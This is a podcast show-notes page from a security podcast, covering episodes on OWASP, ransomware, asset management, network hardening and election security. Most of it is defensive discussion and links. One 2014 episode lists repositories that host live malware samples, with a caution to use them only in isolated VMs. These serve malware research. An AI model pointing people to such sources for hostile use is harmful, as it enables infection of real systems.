Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
16 Sep 2021 | SPONSOR: Blumira's Patrick Garrity | 00:48:10
Blumira- Per crunchbase: Contact sales@blumira.com
Patrick Garrity, VP of Operations. Patrick has years of experience in the security industry building and scaling usable security products. He currently leads Blumira’s product, sales and marketing teams. Prior to joining Blumira, he led sales engineering, product marketing and international expansion for Duo Security. Twitter = @Thisisnottap
https://www.ibm.com/cloud/blog/top-5-advantages-of-software-as-a-service https://www.outsource2india.com/software/articles/software-as-a-service.asp
5 Advantages of SaaS:
Reduced time to benefit. Software as a service (SaaS) differs from the traditional model because the software (application) is already installed and configured. ...
Lower costs. ...
Scalability and integration. ...
New releases (upgrades) ...
Easy to use and perform proof-of-concepts.
5 Disadvantages of SaaS:
Insufficient Data Security. SaaS-based application model.
Difficulty with Regulations Compliance.
Cumbersome Data Mobility.
Low Performance.
Troublesome Software Integration.
Limit Attack Surface https://www.wallix.com/blog/top-10-ways-to-limit-attack-surface https://www.okta.com/identity-101/what-is-an-attack-surface/ https://securityscorecard.com/blog/what-is-cyber-attack-surface-management
07 Feb 2015 | 2015-006- Is your ISP doing a 'man-in-the-middle' on you? | 00:59:29
During our research with Lee Brotherston, who we had on last week for our podcast on threat modeling, we got to listen to one of his talks about how his ISP in Canada was actively doing a Man-in-Middle injection of a banner into sites that he visited.
We were intrigued, and also gobsmacked (I can say that, right?) about the brashness of an ISP not apparently understanding the security implications of this, so we had him back on to talk about the finer points of his research. The bad news? Other ISPs, including American ISPs, are using this technology.
This is one of those podcasts that you need to tell your friends about, cause it's truly surprising the lengths ISPs go to injecting content into your pages. We also have a short message about the Bsides Las Vegas Proving Grounds this year... If you've wanted to present a paper at a conference, and have a mentor guide you through the process, hit them up on the Proving Grounds page at http://www.bsideslv.com Show notes (lots of info): https://docs.google.com/document/d/1YLkiRE1SVIyWquWc-iQrESWlT10rSJmW1VcrOX3kQZ0/edit?usp=sharing
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
16 Jun 2014 | OWASP Top Ten: Numbers 6 - 10 | 00:45:18
As we wade through the morass of the Infosec swamp, we come across the OWASP 2013 report of web app vulnerabilities. Since Mr. Boettcher and I find ourselves often attempting to explain these kinds of issues to people on the Internet and in our daily lives, we thought it would be prudent to help shed some light on these. So this week, we discuss the lower of the top 10, the ones that aren't as glamorous or as earth shaking as XSS or SQLI, but are gotchas that will bite thine ass just as hard. Next week is the big ones, the Top 5... all your favorites, in one place!
OWASP Top 10 (2013) PDF: http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013.pdf Costs of finding web defects early (2008): http://www.informit.com/articles/article.aspx?p=1193473&seqNum=6
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
08 Nov 2017 | 2017-037 - Asset management techniques, and it's importance, DDE malware | 00:52:29
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-037-asset_management.mp3
We started off the show talking to Mr. Boettcher about what DDE is and how malware is using this super legacy Windows component (found in Windows 2) to propagate malware in MS Office docs and spreadsheets. We also talk about how to protect your Windows users from this. We then get into discussing why it's so important to have proper asset management in place. Without knowing what is in your environment, you could suffer gaps in coverage of your anti-virus/EDR software, be unable to patch systems properly, and even make it easier for lateral movement. Finally, we discuss our recent "Introduction to Reverse Engineering" course with Tyler Hudak (@secshoggoth), and Ms. Berlin's upcoming trip to New Zealand.
RSS: http://www.brakeingsecurity.com/rss Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2 #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.slack.com/join/shared_invite/enQtMjY2NDAyMzgxNjAwLWFjZTc1YzVlYWExM2U5ZjhiNDYwZTIzN2UxNjM1OWIwYzBkMjgzYmY4ZjA2MzViNzQ2ZTUzMGQ2YWYwYWY3NTM or DM us on Twitter, or email us. #iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/ #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ SHOW NOTES:
Oreilly con report
Malware report from Mr. Boettcher
DDE (Dynamic Data Exchange), all the rage
https://en.wikipedia.org/wiki/Windows_2.0
http://home.bt.com/tech-gadgets/computing/10-facts-about-windows-2-11364027546216
https://www.ghacks.net/2017/10/23/disable-office-ddeauto-to-mitigate-attacks/
Why asset management? Know what’s in your environment.
CIS Top 20... no wait, it’s the TOP THREE of the 20. It all builds on this: know what’s in your environment.
https://metacpan.org/pod/App::Netdisco <- NetDisco (great for network equipment)
Where do you store that data? Or is it just enough to know where to get it?
Systems you can pull asset data from:
Patching systems
Chef
WSUS
FIM systems
Tripwire
DLP systems
Vuln Scanners
AV/EDR management
Router/switch tables
DNS
Asset management systems are a gold mine for an attacker: names, IPs, email addresses.
Coverage gaps in these systems will cause you to lose asset visibility
http://www.businessinsider.com/programmer-automates-his-job-2015-11
24 Jan 2023 | Layoff discussions, another TMO breach, OneNote Malware, and more! | 01:23:04
Full youtube video: https://www.youtube.com/watch?v=1Dgq8FpnWPw
21 Jan 2017 | 2017-002: Threat Lists, IDS/IPS rules, and mentoring | 01:05:41
In your environment, you deal with threats from all over the world. Many groups out there pool resources to help everyone deal with those #threats. Some come in the form of threat #intelligence from various intelligence companies, like #Carbon #Black, #FireEye, and #Crowdstrike. But what if your company cannot afford such products, or is not ready to engage those types of companies, and still needs protection? Never fear, there are open source options available (see show notes below). These products aren't perfect, but they will provide a modicum of protection from 'known' bad actors, SSH trolls, etc. We discuss some of the issues with using them, and how to use them in your #environment. Lastly, we discuss #mentorship. Having a good mentor/mentee relationship can be mutually beneficial to both parties. We discuss what it takes to be a good mentee, as well as a good mentor...

RSS: www.brakeingsecurity.com/rss
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2017-002-mentoring_threat_lists.mp3
iTunes: https://itunes.apple.com/us/podcast/2017-002-threat-lists-ids/id799131292?i=1000380246554&mt=2
YouTube: https://www.youtube.com/watch?v=oHNrINl1oZE
----------
HITB announcement: “Tickets are on sale, and entering special code 'brakeingsecurity' at checkout gets you a 10% discount.” Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
----------
Show Notes:
HANGOUTS: https://hangouts.google.com/call/w7rkkde5yrew5nm4n7bfw4wfjme
2017-002-Threat Lists, IDS/IPS rulesets, and infosec mentoring
18 Dec 2018 | 2018-044: Mike Samuels discusses NodeJS hardening initiatives | 00:56:11
Mike Samuels
https://github.com/mikesamuel/attack-review-testbed
https://nodejs-security-wg.slack.com/
Hardening NodeJS
Speaking engagement talks:
A Node.js Security Roadmap at JSConf.eu - https://www.youtube.com/watch?v=1Gun2lRb5Gw
Improving Security by Improving the Framework @ Node Summit - https://vimeo.com/287516009
Achieving Secure Software through Redesign at Nordic.js - https://www.facebook.com/nordicjs/videos/232944327398936/?t=1781
What is a package: (holy hell, why is this so complicated?)
A package is any of:
https://medium.com/@jsoverson/exploiting-developer-infrastructure-is-insanely-easy-9849937e81d4
https://blog.risingstack.com/node-js-security-checklist/
06 Jun 2018 | 2018-019-50 good ways to protect your network, brakesec summer reading program | 00:47:22
Ms. Berlin’s mega tweet on protecting your network
https://twitter.com/InfoSystir/status/1000109571598364672
Utica College CYB617 I tweeted “utica university” many pardons
Mr. Childress’ high school class Laurens, South Carolina
Probably spent as much as a daily coffee at Starbucks… makes all the difference.
CTF Club, and book club (summer reading series)
Patreon SeaSec East
Showmecon Area41con bsidescleveland
Here are 50 FREE things you can do to improve the security of most environments:
Segmentation/Networking:
Access control lists are your friend (deny all first)
Disable ports that are unused, & set up port security
DMZ behind separate firewall
Egress filtering (should be just as strict as ingress)
Geoblocking
Segment with VLANs
Restrict access to backups
Role based servers only! DNS servers/DCs are just that
Network device backups

Windows:
AD delegation of rights
Best practice GPO (NIST GPO templates)
Disable LLMNR/NetBIOS
EMET (when OSes prior to 10 are present)
Get rid of open shares
MBSA
WSUS
** Run as a standard user ** no ‘localadmin’

Endpoints:
App whitelisting
Block browsing from servers. Not all machines need internet access
Change iLO settings/passwords
Use Bitlocker/encryption
Patch *nix boxes
Remove unneeded software
Upgrade firmware

MFA/Auth:
Diff. local admin passwords (LAPS) https://www.microsoft.com/en-us/download/details.aspx?id=46899
Set up centralized logins for network devices. Use TACACS+ or RADIUS
Least privileges EVERYWHERE
Separation of rights - Domain Admin use should be sparse & audited

Logging/Monitoring:
Force advanced file auditing (ransomware detection)
Log successful and unsuccessful logins - Windows/Linux logging cheatsheets

Web:
Fail2ban
For the love of god implement TLS 1.2/3
URLscan
Ensure web logins use HTTPS
ModSecurity

Other:
Block DNS zone transfers
Close open mail relays
Disable telnet & other insecure protocols, or alert on use
DNS servers should not be openly recursive
Don't forget your printers (saved creds aren't good)
Locate and destroy plain text passwords
No open wi-fi, use WPA2 + AES
Password safes

IR:
Incident Response drills
Incident Response runbook & bugout bag
Incident Response tabletops

Purple Team:
Internal & OSINT honeypots
User education exercises
MITRE ATT&CK Matrix is your friend
Vulnerability scanner
16 Jul 2020 | 2020-027-RIPPLE20 Report, supply chain security, responsible disclosure, software development, and vendor care. | 00:48:34
Whitepaper: https://www.jsof-tech.com/ripple20/
[blog] Build your own custom TCP/IP stack: https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/
Another custom TCP/IP stack: https://github.com/tass-belgium/picotcp
RIPPLE 20 Whitepaper: https://drive.google.com/file/d/1d3NNVCRPVFk0-V0HUO5CxWWVn9pYIvmF/view?usp=sharing

Agenda:
Part 1: Background on the report
Why is it called RIPPLE20? What’s the RIPPLE about?
Communications with Treck (and its Japanese counterpart). Were you surprised about the reaction? Positive or negative?
Types of systems affected? IoT, embedded systems, SCADA
What precipitated the research?
What difficulties did you face in finding these vulns? Deadlines?
What tools were used for analysis? (I think you mentioned Forescout --brbr)
What kind of extensibility are we talking about? TCP sizes?
What did JSOF gain by doing this?
What were the initial benefits of using the TCP/IP stack? Speed? Size?
Did Treck give you access to source? Any specific requirements set by Treck? Any items that were off-limits?
Updates since the report was released?
Are your vulns such that they can be detected online?
Part 2: Supply chain issues
What should companies do when they don’t know what’s in their own tech stack?
Software bill of materials: https://en.wikipedia.org/wiki/Software_bill_of_materials
The PicoTCP link above does not release all code, because they use binary blobs that make proper code review next to impossible:
“Unfortunately we can't release all the code, a.o. because some parts depend on code or binaries that aren't GPL compatible, some parts were developed under a commercial contract, and some consist of very rough proof-of-concept code. If you want to know more about the availability under the commercial license, or the possibility of using our expert services for porting or driver development, feel free to contact us at picotcp@altran.com.”
BLoBs = https://en.wikipedia.org/wiki/Proprietary_device_driver

Vendor Contact
How many organizations are affected by these vulnerabilities?
Are some devices and systems more vulnerable than others?
How many are you still investigating to see if they are affected?
What’s the initial email look like when you tell a company “you’re vulnerable to X”?
Who are you dealing with initially?
What is your delivery when you’re routed to non-technical people?
How did you tailor your initial response when you learned of the position of the person?
Lessons Learned: Any additional tooling that you’d have used?
BlackHat talk: 05 August
What should companies do to reduce or mitigate the chances of the types of vulnerabilities found by your org?
https://www.supplychainservices.com/blog/major-security-risks-windows-embedded-users
24 May 2022 | news, infosystir's talk at RSA, conti has an 'image' problem | 00:45:42
https://www.securityweek.com/conti-ransomware-operation-shut-down-after-brand-becomes-toxic
https://portswigger.net/daily-swig/chicago-public-schools-data-breach-blamed-on-ransomware-attack-on-supplier
https://www.helpnetsecurity.com/2022/05/23/protect-kubernetes-cluster/
https://www.darkreading.com/application-security/6-scary-tactics-used-in-mobile-app-attacks
12 Jan 2017 | 2017-001: A New Year, malware legislation, and a new cast member! | 00:43:44
We start Brakeing Down Security with a huge surprise! A 3rd member of the podcast! Amanda #Berlin (@infosystir) joins us this year to help us educate people on #security topics. During the year, she'll be getting us some audio from various conventions and giving us her perspective working at an #MSSP, as well as on a blue team (defender). We start out talking about new #California #legislation about making #malware illegal. What are politicians in California thinking? We work through that and try to find some understanding. With all the various secure messaging systems out there, we discuss why secure messaging systems fail so poorly with regards to #interoperability and the difficulties in getting average non-infosec people to adopt one. We also discuss #Perfect #Forward #Secrecy and how it prevents people from decrypting old messages, even if the key is compromised.

Join our #Slack Channel! Sign up at https://brakesec.signup.team
---Show Notes--- News story: http://www.latimes.com/politics/la-pol-sac-crime-ransomware-bill-20160712-snap-story.html
“If this legislation gives prosecutors the tools that they didn’t have before, where are the cases that they have lost because they didn’t have these tools?” said Brandon Perry, a senior consultant for NTT Com Security. “Authorities are focused on prosecuting criminals that they can’t even find, as opposed to educating the victims to prevent this from happening again and again.”
Ransomware won’t infect you if you watch training videos: http://thehackernews.com/2017/01/decrypt-ransomware-files.html
Secure messaging - stuck in an Apple ecosystem
Too many, no interoperability: Signal, Whisper, Wickr, Wire, WhatsApp, FB messenger
I uninstalled Signal… can’t convince people to adopt something if everyone cannot message one another --BrBr
OpenPGP is ‘dangerous’: http://arstechnica.com/information-technology/2016/12/signal-does-not-replace-pgp/
Forward Secrecy - https://en.wikipedia.org/wiki/Forward_secrecy
“A public-key system has the property of forward secrecy if it generates one random secret key per session to complete a key agreement, without using a deterministic algorithm.” (a deterministic algorithm is one where a given input gives the same output every time)
Perfect Forward Secrecy - “In cryptography, forward secrecy (FS; also known as perfect forward secrecy[1]) is a property of secure communication protocols in which compromise of long-term keys does not compromise past session keys.”
Ms. Amanda’s pentest homework: https://docs.google.com/document/d/17NJPXpqB5Upma2-6Hu5svBxd8PH0Ex7VgCvRUhiUNk8/edit
30 Jun 2017 | 2017-SPECIAL- Michael Gough and Brian Boettcher discuss specific ransomware | 00:19:26
Due to popular demand, we are adding the extra content from last week's show as a standalone podcast.
Michael Gough (@hackerHurricane) and Mr. Boettcher (BrakeSec Co-Host, and @boettcherpwned) sit down and discuss the popularity of ransomware as a topic. They discuss what email attachments to block, how to test your own email gateway, and what controls you should implement to help defend against the #petya #notpetya ransomware.
14 Mar 2016 | 2016-011-Hector Monsegur, deserialization, and bug bounties | 01:12:26
Download Here: http://traffic.libsyn.com/brakeingsecurity/2016-011-Hector_Monsegur-bug_bounties-serialization.mp3
iTunes Direct Link: https://itunes.apple.com/us/podcast/2016-011-hector-monsegur-serialization/id799131292?i=364768504&mt=2

Hector Monsegur has had a colorful history. A reformed black hat who went by the name 'Sabu' when he was involved in the hacker collectives "Lulzsec" and "Anonymous", he turned state's evidence for the FBI, working to stop further hacking attempts by the same people he was working with. https://en.wikipedia.org/wiki/Hector_Monsegur

This week, we got to sit down with Hector to find out what he's been doing in the last few years. Obviously, a regular job in the security realm for a large company is not possible for someone with a past as colorful as Mr. Monsegur's. So we discuss some of the methods that he's used to make ends meet. Which brings us to the topic of bug bounties. Do they accomplish what they set out to do? Are they worth the effort companies put into them? And how do you keep bounty hunters from going rogue and using vulnerabilities found against a company on the side?

In an effort to satisfy my own curiosity, I asked Hector if he could explain what a 'deserialization' vulnerability is, and how it can be used in applications. They are different from your run-of-the-mill, everyday variety of OWASP error, but this vulnerability can totally ruin your day...

Finally, we ask Hector for some advice for that 'proto black hat' who is wanting to head down the road that Hector went. The answer will surprise you... We hope you enjoy this most interesting interview with an enigmatic and controversial person, and hope that the information we provide gives another point of view into the mind of a reformed "black hat" hacker...
30 Jul 2022 | Tanya Janca, Securing APIs, finding Security Champions, and accepting Risk | 00:41:37
Tanya Janca, also known as @SheHacksPurple, is the best-selling author of ‘Alice and Bob Learn Application Security’. She is also the founder of We Hack Purple, an online learning academy, community and podcast that revolves around teaching everyone to create secure software. Tanya has been coding and working in IT for over twenty years, won countless awards, and has been everywhere from startups to public service to tech giants (Microsoft, Adobe, & Nokia). She has worn many hats: startup founder, pentester, CISO, AppSec Engineer, and software developer. She is an award-winning public speaker, active blogger & streamer, and has delivered hundreds of talks and trainings on 6 continents. She values diversity, inclusion, and kindness, which shines through in her countless initiatives.
BrakeSec is:
24 Feb 2014 | Episode 6 - Malware Interview with Michael Gough (Part 2) | 00:45:20
This is part 2 of our interview with malware researcher Michael Gough. We talk about mobile device malware, and how the Sniper Forensic Toolkit differs from Tripwire.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com). "Infectedpc_primary.jpg" is from bugsrepair.com
01 Nov 2016 | 2016-043: BSIMMv7, a teachable moment, and our new Slack Channel! | 01:14:10
**Brakeing Down Security has a Slack channel now... just go to https://brakesec.signup.team and follow the instructions to have the bot add you to our show's official channel.**

Every year, organizations come out with industry reports that show how well or, more often than not, how poorly we are doing. We always enjoy reviewing the BSIMM report, because it's unvarnished, and a good measure of a good number of industry verticals, like finance, manufacturing, cloud, and even companies that make IoT devices. Join Mr. Boettcher and me this week as we go over the findings of the report, discuss what got better, what still sucks, and what we shouldn't fault companies for not having. We also have a teachable moment when I discuss a security faux pas that happened to me (Bryan) recently regarding an email account and my Skype. 2 factor authentication is your friend, and if it's available, use it. Mr. Boettcher discusses some recent malware that has reared its ugly head, and how to detect it.

Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-043-BSIMMv7.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-043-bsimmv7-teachable/id799131292?i=1000377394890&mt=2
YouTube: https://www.youtube.com/watch?v=I3FLSLSSb_Y
06 Jul 2015 | 2015-029: Big Brown cloud honeyblog with @theroxyd | 00:49:00
Roxy, who we interviewed a few months ago on our podcast about hackerspaces, is back with us this week to discuss a project she is working on, called 'Big Brown Cloud'. If you've ever wanted to set up your own fake blog and send people to it to gain information on possible attacks, you've come to the right place.
We also get an update on the hackerspace that Jarrod, Sean, and Roxy were getting set up a few months ago. They've come a long way, and they are about to move into their new facility: https://thelab.ms/
15 Dec 2014 | Tyler Hudak (@secshoggoth) Discusses incident response, and DIY malware research | 00:41:44
This week, Tyler gave us a great deal of information on where to start if you wanted to become a malware researcher. He also gave us websites where you can get malware and ways to analyze it. We asked Tyler what blue teams can do when they are infected, and he gave us some excellent advice... I also recite some prose from a classic horror author, so come for the malware, stay for the prose! :)

***NOTE: I guess now would be a good time to mention that many of the links below have unsafe software and actual malware payloads, so use with extreme caution. Especially do not download anything from these sites unless it's in a VM that is not on your company's assets.***

http://www.hopperapp.com/ - Disassemble OS X binaries
http://en.wikibooks.org/wiki/X86_Disassembly/Disassemblers_and_Decompilers - other Disassemblers
http://vxheaven.org/ - Virus Heaven
http://www.malwaredomainlist.com/ - Find websites serving malware
http://oc.gtisc.gatech.edu:8080/ - Georgia Tech malware repository
Sandboxie - http://www.sandboxie.com/
KoreLogic - http://www.korelogic.com/ (lots of great tools here)
http://secshoggoth.blogspot.com/ - Tyler's Blog
17 Jul 2016 | 2016-028: Cheryl Biswas discusses TiaraCon, Women in Infosec, and SCADA headaches | 01:00:24
Long time listeners will remember Ms. Cheryl #Biswas as one of the triumvirate we had on to discuss #mainframes and mainframe #security (http://traffic.libsyn.com/brakeingsecurity/2016-008-mainframe_secruity.mp3). I was interested in the goings on at BlackHat/DefCon/BsidesLV, and heard about #TiaraCon (@tiarac0n on Twitter). I went to find someone involved to understand what it was all about, and Ms. Cheryl reached out. She's an #organizer and was more than happy to sit down with me and explain why it was started. This is its inaugural year, and they already have some excellent schwag and sponsors. This is not just an event for ladies, but a way of #empowering #women, creating #mentorship opportunities, and assisting people moving into the #infosec industry. Also, since Ms. Cheryl loves discussing #ICS and #SCADA problems and headaches, we got into the headaches, #challenges, and maybe some 'logical' solutions to fixing SCADA vulns... but does the logical approach work in a business sense?

TiaraCon official site: http://tiaracon.org/
TiaraCon Dates: Thursday Aug 4 - Friday Aug 5
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-028-Cheryl_Biswas_Tiaracon_ICSSCADA_headaches.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-028-cheryl-biswas-discusses/id799131292?i=1000372642921&mt=2
Youtube: https://www.youtube.com/watch?v=vsolDjsz5M4
17 Aug 2018 | 2018-029-postsummercamp-future_record_breached-vulns_nofix | 00:55:31
Post-Hacker Summercamp
IppSec Walkthroughs
Brakesec Derbycon ticket CTF -
Drama - (hotel room search gate) AirconditionerGate
Personal privacy: Ask for ID. Call the front desk. Use the deadbolt (can be bypassed). Plug the peephole with TP.
Hotel rooms aren’t secure (neither are the safes)
Probably the most hostile environment infosec people go into to try and be secure/private
https://www.informationsecuritybuzz.com/expert-comments/over-146-billion-records/ (based on a study by Juniper Research)
https://www.teepublic.com/user/bdspodcast
04 Dec 2019 | 2019-043-Bea Hughes, dealing with realistic threats in your org | 01:10:59
Realistic Threats
Nation states aren’t after you
https://twitter.com/beajammingh/status/1191884466752385025
https://twitter.com/beajammingh/status/1198671660150226946
https://twitter.com/beajammingh/status/1198671952824565762
https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling
What are credible threats?
Malicious insiders -
Non-malicious insiders - https://www.scmagazine.com/home/security-news/not-every-insider-threat-is-malicious-but-all-are-dangerous/
Education issue? Is there such a thing as ‘non-malicious’ or is this just bunk?
Real threats: https://resources.infosecinstitute.com/5-new-threats-every-organization-prepared-2018/
CIO magazine threats -- buzzword threats (we should totally containerize all the things)
Vulns that have names (blue team is stuck dealing with ‘theoretical’ issues e.g. SPECTRE/MELTDOWN)
Lack of well-priced training? Dev training? Security training?
Better management communication will reduce threats
Building trust so they don’t freak when ‘$insert_named_vuln’ shows up
Gotta frame it to business needs
“Everyone is vulnerable” - keep FUD to a minimum, don’t exaggerate.
Know your industry’s threats (phishing, money transfer fraud, malware)

Patreon donor: Michael K. $10 patron!
Layer8conf - https://www.workshopcon.com/events https://layer8conference.com/
Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures. As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups. In terms of sponsorship information for Layer8, Patrick wants people to send an email to sponsors@layer8conference.com Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!
Saturday June 6, 2020, RI Convention Center
https://www.dianainitiative.org/ https://twitter.com/DianaInitiative
Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)
02 Nov 2020 | 2020-040- Jeremy Mio, State of Ohio Election Security | 01:03:35
Previous Election Security podcast: https://brakeingsecurity.com/2018-042-election-security-processes-in-the-state-of-ohio
Jeremy Mio (@cyborg00101)
https://itsecurity.cuyahogacounty.us/
(added cybersecurity Directives during 2018 last podcast -jmio)
Einstein (US-CERT program) - Wikipedia
Albert Program (added new cybersecurity Directives since last podcast -jmio)
LaRose issues directive to set a new standard for election security in 2020 (added -jmio)
Vuln disclosure policy: Vulnerability Disclosure Policy - Ohio Secretary of State (ohiosos.gov)
Did anyone think to pentest the vuln acceptance form? (lol, layers in layers --brbr)
Ohio to ramp up election security with new federal funds | TheHill
“Ohio has taken steps to combat those types of threats. In October, Ohio Gov. Mike DeWine (R) signed into law a measure that required post-election audits to ensure the accuracy of the vote count, and created a ‘civilian cyber security reserve’ to defend against potential cyberattacks.”
“His [secretary of state LaRose] first-of-its-kind Vulnerability Disclosure Policy invites Ohio’s crop of “white-hat” hackers — the good guys, opposite malevolent “black-hat” hackers — to break into the state’s election system, find bugs and report them so officials can ensure they’re fixed by Election Day. There are some strings attached: White hats aren’t allowed to phish for information or tamper with electronic county voter registration systems, and actual voting machines — legally barred from being connected to the internet — are off-limits. If they do find sensitive information, they’re expected to report it.” How did the threat model shift from the last time we talked? What has changed in terms of organization and threats? You mentioned 4-5 different voting regions last time, all with different levels of technology. Any updates on the tech? How did covid change how voting occurred? How have you leveraged the Elections Infrastructure ISAC (EI-ISAC) in passing along threats and sharing information?
Has insider threat been part of your threat model and what has your group done to minimize the chances? (why does it feel like the Oscars has more scrutiny in terms of voting security than the US democratic process? --brbr) What does physical security look like in terms of people going to the polls? (wasn’t sure if that was something in your purview --brbr) (this is not (Election Board and Sheriff), but can discuss high level -jmio) Using hardware domain block services? Malicious Domain Blocking and Reporting (MDBR) Newest Service for U.S. SLTTs (cisecurity.org) LaRose Setting New Standard For Election Security - Ohio Secretary of State (ohiosos.gov) 88 election districts will have access to domain blocking tech (mandated to start by 28 August 2020), cybersecurity experts. Can you give us an update on any of what was mentioned in the press release
Background checks | |||||||||||||||||||||||||||||||||
03 Feb 2021 | 2021-004-Danny Akacki talks about Mergers and Acquisitions - Part 2 | 00:47:45
Discussion on Mergers and acquisitions processes
On being acquired, but also if you’re acquiring a company
Best Practices
Best Practices of Mergers and Acquisitions (workforce.com)
The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com)
Security Considerations in the Merger/Acquisition Process (sans.org)
The 10 steps to successful M&A integration | Bain & Company
Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com)
“We’ve been acquired by X!” First thing people think: “oh no, what’s gonna happen to me.”
04 Dec 2015 | 2015-049-Can you achieve Security Through Obscurity? | 00:42:19
That's the question many think is an automatic 'yes'. Whether your httpd is running on port 82, or maybe your fancy #wordpress #module needs some cover because the code quality is just a little lower than where it should be and you need to cover up some cruft.
This week, Mr. Boettcher and I discuss reasons for obscuring for the sake of #security, when it's a good idea, and when you shouldn't #obscure anything (hint: using #ROT-14, for example). #encryption #infosec
Show Notes: https://docs.google.com/document/d/1PioC2hnQHhm5Xd1SCT4ewvZmZiLcE5pGQuif4Tuk_zE/edit?usp=sharing
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-049-Security_by_Obscurity.mp3
Mr. Boettcher's Twitter: http://www.twitter.com/boettcherpwned
Bryan's Twitter: http://www.twitter.com/bryanbrake
TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
BrakeSec Podcast Twitter: http://www.twitter.com/brakesec
Join our Patreon!: https://www.patreon.com/bds_podcast
Comments, Questions, Feedback: bds.podcast@gmail.com
20 Jun 2016 | 2016-024: Kim Green, on CISOaaS, the Redskins Laptop, and HIPAA | 01:13:20
We are pleased to introduce Ms. Kim Green (Twitter: @kim1green). She is the CEO of KAZO Security, as well as the CISO/CPO of Zephyr Health, a #SaaS based #Healthcare data #analytics company. She brings over 20 years of experience in healthcare and leadership to help small and medium business companies get help from a #CISO to assist in an advisory role.
Ms. Green also started a bug bounty program at Zephyr Health to assist them in shoring up their application, finding #vulnerabilities that their internal teams may have missed. We are going to discuss with her why they decided to make it a private bug bounty, and what the result was. https://www.youtube.com/watch?v=GbW777t1tTA -- more about the bug bounty
We also discuss why #HIPAA seems to be so far behind in terms of being able to protect #PHI/#PII and what, if anything, can be done to fix it.
We finish up discussing a recent news story about how the National Football League (#NFL) team Washington Redskins had a trainer lose a laptop with the PII and health information of several thousand NFL players. We discuss why they did not violate HIPAA, and what, if anything, they did violate.
iTunes: https://itunes.apple.com/us/podcast/2016-024-kim-green-on-cisoaas/id799131292?i=1000371021883&mt=2
YouTube: https://www.youtube.com/watch?v=F9zvkeuON4I&list=PLqJHxwXNn7guMA6hnzex-c12q0eqsIV_K&index=1
SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: bds.podcast@gmail.com
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM: https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
21 Jul 2014 | Part 2 with Georgia Weidman! | 00:46:04
It only gets better in Part 2 of our Interview with Georgia Weidman, Author, Security Researcher and Creator of the Smartphone Pentesting Framework.
She talks about how people underestimate the mobile platform for pentesting purposes, and we even find out that in addition to teaching a class on exploit development at BlackHat this year, she's going to be helping a great organization overseas. We also got her talking about some do's and don'ts of pentesting! ;) Please enjoy!
Georgia's book on No Starch: http://www.nostarch.com/pentesting on Amazon.com: http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641 (non-sponsored link)
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
09 May 2016 | 2016-018-software restriction policies and Applocker | 01:00:01
Windows has all the tools you need to secure an OS, but we rarely use them. One example of this is 'Software Restriction Policies', a method by which you can block certain files from being saved anywhere, control what file types can be executed in a directory, and even control whether or not software is allowed to install. We also discuss the use of parental controls as a cheap, easy method of restricting users from accessing certain websites, installing software from the iTunes store, or using certain functions or applications.
Also, the 2nd clue for our CTF can be found in this podcast... see if you can find the giant clue... :)
**NOTE: We had an issue with Mr. Boettcher's Windows 10 install. He's using Windows 10 Home, which does not appear to have AppLocker or Software Restriction Policy by default. So, I cut a lot of us bickering^H^H^H^H discussing how to get it to work, so the middle around the 25:00 mark will feel a tad off. Apologies... I should have stopped recording.
Links referred to during the podcast:
https://technet.microsoft.com/en-us/library/hh831534.aspx
http://mechbgon.com/srp/ - LOL, mentions the use of ‘parental controls’ to restrict systems
